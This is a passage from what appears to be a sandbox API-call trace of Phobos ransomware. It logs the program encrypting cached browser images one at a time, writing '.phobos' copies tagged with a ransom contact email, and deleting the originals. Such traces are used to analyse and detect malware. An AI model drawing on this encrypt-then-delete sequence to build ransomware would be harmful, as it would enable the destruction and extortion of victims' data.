files\\low\\content.ie5\\ikqeepzr\\bbbpk5j[1].jpg")) returned 0x2020 [0181.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPK5J[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpk5j[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPK5J[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpk5j[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.501] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.501] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPK5J[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpk5j[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.502] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0181.502] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.502] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x9be, lpOverlapped=0x0) returned 1 [0181.529] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9c0, dwBufLen=0x9c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9c0) returned 1 [0181.530] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x9c0, lpOverlapped=0x0) returned 1 [0181.531] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0181.531] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.531] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.531] CryptDestroyKey (hKey=0xa32c68) returned 1 [0181.531] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.531] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.531] CloseHandle (hObject=0xb8) returned 1 [0181.531] CloseHandle (hObject=0x194) returned 1 [0181.531] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPK5J[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpk5j[1].jpg")) returned 1 [0181.532] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUL3E[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbul3e[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.533] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2141) returned 1 [0181.533] CloseHandle (hObject=0x194) returned 1 [0181.533] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUL3E[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbul3e[1].jpg")) returned 0x2020 [0181.533] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUL3E[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbul3e[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUL3E[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbul3e[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.534] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.534] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUL3E[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbul3e[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.534] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0181.534] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.534] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x85d, lpOverlapped=0x0) returned 1 [0181.711] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x860, dwBufLen=0x860 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x860) returned 1 [0181.711] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x860, lpOverlapped=0x0) returned 1 [0181.712] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0181.712] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.712] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.712] CryptDestroyKey (hKey=0xa32c68) returned 1 [0181.712] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.713] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.713] CloseHandle (hObject=0x194) returned 1 [0181.713] CloseHandle (hObject=0xb8) returned 1 [0181.713] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUL3E[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbul3e[1].jpg")) returned 1 [0181.714] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.714] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2168) returned 1 [0181.714] CloseHandle (hObject=0xb8) returned 1 [0181.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[1].jpg")) returned 0x2020 [0181.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.715] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.715] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.716] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0181.716] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.716] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x878, lpOverlapped=0x0) returned 1 [0181.818] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x880, dwBufLen=0x880 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x880) returned 1 [0181.818] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x880, lpOverlapped=0x0) returned 1 [0181.819] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0181.819] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.819] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.819] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.819] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.819] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.819] CloseHandle (hObject=0xb8) returned 1 [0181.819] CloseHandle (hObject=0x194) returned 1 [0181.820] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[1].jpg")) returned 1 [0181.820] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBX3z0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbx3z0[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.822] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1919) returned 1 [0181.822] CloseHandle (hObject=0x194) returned 1 [0181.822] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBX3z0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbx3z0[1].jpg")) returned 0x2020 [0181.822] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBX3z0[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbx3z0[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBX3z0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbx3z0[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.822] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.822] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBX3z0[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbx3z0[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.823] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0181.823] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.823] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x77f, lpOverlapped=0x0) returned 1 [0181.885] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x780, dwBufLen=0x780 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x780) returned 1 [0181.885] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x780, lpOverlapped=0x0) returned 1 [0181.886] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0181.886] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.886] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.886] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0181.886] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.887] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.887] CloseHandle (hObject=0x194) returned 1 [0181.887] CloseHandle (hObject=0xb8) returned 1 [0181.887] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBX3z0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbx3z0[1].jpg")) returned 1 [0181.888] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYEW1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyew1[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.889] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=8883) returned 1 [0181.889] CloseHandle (hObject=0xb8) returned 1 [0181.889] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYEW1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyew1[1].jpg")) returned 0x2020 [0181.889] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYEW1[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyew1[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYEW1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyew1[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.889] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.889] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYEW1[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyew1[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.889] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0181.890] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.890] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x22b3, lpOverlapped=0x0) returned 1 [0181.905] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x22c0, dwBufLen=0x22c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x22c0) returned 1 [0181.905] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x22c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x22c0, lpOverlapped=0x0) returned 1 [0181.906] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, 